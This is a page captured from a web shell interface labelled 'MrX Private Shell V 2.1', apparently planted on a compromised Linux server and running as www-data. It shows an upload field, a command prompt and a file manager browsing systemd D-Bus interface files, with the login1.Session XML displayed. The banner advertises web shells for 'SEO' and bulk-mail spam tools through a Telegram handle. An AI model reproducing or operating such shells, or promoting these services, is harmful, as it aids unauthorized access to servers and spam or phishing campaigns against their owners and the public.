__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<!DOCTYPE node PUBLIC "-//freedesktop//DTD D-BUS Object Introspection 1.0//EN"
"https://www.freedesktop.org/standards/dbus/1.0/introspect.dtd">
<node>
 <interface name="org.freedesktop.DBus.Peer">
  <method name="Ping"/>
  <method name="GetMachineId">
   <arg type="s" name="machine_uuid" direction="out"/>
  </method>
 </interface>
 <interface name="org.freedesktop.DBus.Introspectable">
  <method name="Introspect">
   <arg name="xml_data" type="s" direction="out"/>
  </method>
 </interface>
 <interface name="org.freedesktop.DBus.Properties">
  <method name="Get">
   <arg name="interface_name" direction="in" type="s"/>
   <arg name="property_name" direction="in" type="s"/>
   <arg name="value" direction="out" type="v"/>
  </method>
  <method name="GetAll">
   <arg name="interface_name" direction="in" type="s"/>
   <arg name="props" direction="out" type="a{sv}"/>
  </method>
  <method name="Set">
   <arg name="interface_name" direction="in" type="s"/>
   <arg name="property_name" direction="in" type="s"/>
   <arg name="value" direction="in" type="v"/>
  </method>
  <signal name="PropertiesChanged">
   <arg type="s" name="interface_name"/>
   <arg type="a{sv}" name="changed_properties"/>
   <arg type="as" name="invalidated_properties"/>
  </signal>
 </interface>
 <interface name="org.freedesktop.login1.Session">
  <property name="Id" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="User" type="(uo)" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="Name" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="Timestamp" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="TimestampMonotonic" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="VTNr" type="u" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="Seat" type="(so)" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="TTY" type="s" access="read">
  </property>
  <property name="Display" type="s" access="read">
  </property>
  <property name="Remote" type="b" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="RemoteHost" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="RemoteUser" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="Service" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="Desktop" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="Scope" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="Leader" type="u" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="Audit" type="u" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="Type" type="s" access="read">
  </property>
  <property name="Class" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="Active" type="b" access="read">
  </property>
  <property name="State" type="s" access="read">
  </property>
  <property name="IdleHint" type="b" access="read">
  </property>
  <property name="IdleSinceHint" type="t" access="read">
  </property>
  <property name="IdleSinceHintMonotonic" type="t" access="read">
  </property>
  <property name="LockedHint" type="b" access="read">
  </property>
  <method name="Terminate">
  </method>
  <method name="Activate">
  </method>
  <method name="Lock">
  </method>
  <method name="Unlock">
  </method>
  <method name="SetIdleHint">
   <arg type="b" name="idle" direction="in"/>
  </method>
  <method name="SetLockedHint">
   <arg type="b" name="locked" direction="in"/>
  </method>
  <method name="Kill">
   <arg type="s" name="who" direction="in"/>
   <arg type="i" name="signal_number" direction="in"/>
  </method>
  <method name="TakeControl">
   <arg type="b" name="force" direction="in"/>
  </method>
  <method name="ReleaseControl">
  </method>
  <method name="SetType">
   <arg type="s" name="type" direction="in"/>
  </method>
  <method name="SetDisplay">
   <arg type="s" name="display" direction="in"/>
  </method>
  <method name="SetTTY">
   <arg type="h" name="tty_fd" direction="in"/>
  </method>
  <method name="TakeDevice">
   <arg type="u" name="major" direction="in"/>
   <arg type="u" name="minor" direction="in"/>
   <arg type="h" name="fd" direction="out"/>
   <arg type="b" name="inactive" direction="out"/>
  </method>
  <method name="ReleaseDevice">
   <arg type="u" name="major" direction="in"/>
   <arg type="u" name="minor" direction="in"/>
  </method>
  <method name="PauseDeviceComplete">
   <arg type="u" name="major" direction="in"/>
   <arg type="u" name="minor" direction="in"/>
  </method>
  <method name="SetBrightness">
   <arg type="s" name="subsystem" direction="in"/>
   <arg type="s" name="name" direction="in"/>
   <arg type="u" name="brightness" direction="in"/>
  </method>
  <signal name="PauseDevice">
   <arg type="u" name="major"/>
   <arg type="u" name="minor"/>
   <arg type="s" name="type"/>
  </signal>
  <signal name="ResumeDevice">
   <arg type="u" name="major"/>
   <arg type="u" name="minor"/>
   <arg type="h" name="fd"/>
  </signal>
  <signal name="Lock">
  </signal>
  <signal name="Unlock">
  </signal>
 </interface>
</node>

Filemanager

Name Type Size Permission Actions
org.freedesktop.LogControl1.xml File 1.93 KB 0644
org.freedesktop.PackageKit.Transaction.xml File 90.17 KB 0644
org.freedesktop.PackageKit.xml File 21.5 KB 0644
org.freedesktop.UPower.Device.xml File 29.07 KB 0644
org.freedesktop.UPower.KbdBacklight.xml File 4.08 KB 0644
org.freedesktop.UPower.xml File 7.75 KB 0644
org.freedesktop.bolt.xml File 15.85 KB 0644
org.freedesktop.fwupd.xml File 5.6 KB 0644
org.freedesktop.home1.Home.xml File 4.24 KB 0644
org.freedesktop.home1.Manager.xml File 5.96 KB 0644
org.freedesktop.hostname1.xml File 5.51 KB 0644
org.freedesktop.import1.Manager.xml File 4.08 KB 0644
org.freedesktop.import1.Transfer.xml File 2.34 KB 0644
org.freedesktop.locale1.xml File 2.51 KB 0644
org.freedesktop.login1.Manager.xml File 17.87 KB 0644
org.freedesktop.login1.Seat.xml File 2.42 KB 0644
org.freedesktop.login1.Session.xml File 6.15 KB 0644
org.freedesktop.login1.User.xml File 3.36 KB 0644
org.freedesktop.machine1.Image.xml File 3.5 KB 0644
org.freedesktop.machine1.Machine.xml File 4.98 KB 0644
org.freedesktop.machine1.Manager.xml File 9.92 KB 0644
org.freedesktop.network1.DHCPServer.xml File 3.29 KB 0644
org.freedesktop.network1.DHCPv4Client.xml File 3.28 KB 0644
org.freedesktop.network1.DHCPv6Client.xml File 3.28 KB 0644
org.freedesktop.network1.Link.xml File 3.15 KB 0644
org.freedesktop.network1.Manager.xml File 4.53 KB 0644
org.freedesktop.network1.Network.xml File 2.38 KB 0644
org.freedesktop.oom1.Manager.xml File 1.51 KB 0644
org.freedesktop.portable1.Image.xml File 5.82 KB 0644
org.freedesktop.portable1.Manager.xml File 5.96 KB 0644
org.freedesktop.resolve1.DnssdService.xml File 1.41 KB 0644
org.freedesktop.resolve1.Link.xml File 4.18 KB 0644
org.freedesktop.resolve1.Manager.xml File 7.87 KB 0644
org.freedesktop.systemd1.Automount.xml File 17.66 KB 0644
org.freedesktop.systemd1.Device.xml File 17.05 KB 0644
org.freedesktop.systemd1.Job.xml File 2.2 KB 0644
org.freedesktop.systemd1.Manager.xml File 36.78 KB 0644
org.freedesktop.systemd1.Mount.xml File 61.26 KB 0644
org.freedesktop.systemd1.Path.xml File 17.97 KB 0644
org.freedesktop.systemd1.Scope.xml File 32.99 KB 0644
org.freedesktop.systemd1.Service.xml File 68.91 KB 0644
org.freedesktop.systemd1.Slice.xml File 31.08 KB 0644
org.freedesktop.systemd1.Socket.xml File 68.18 KB 0644
org.freedesktop.systemd1.Swap.xml File 60.19 KB 0644
org.freedesktop.systemd1.Target.xml File 16.98 KB 0644
org.freedesktop.systemd1.Timer.xml File 19.07 KB 0644
org.freedesktop.systemd1.Unit.xml File 16.92 KB 0644
org.freedesktop.timedate1.xml File 2.86 KB 0644
Filemanager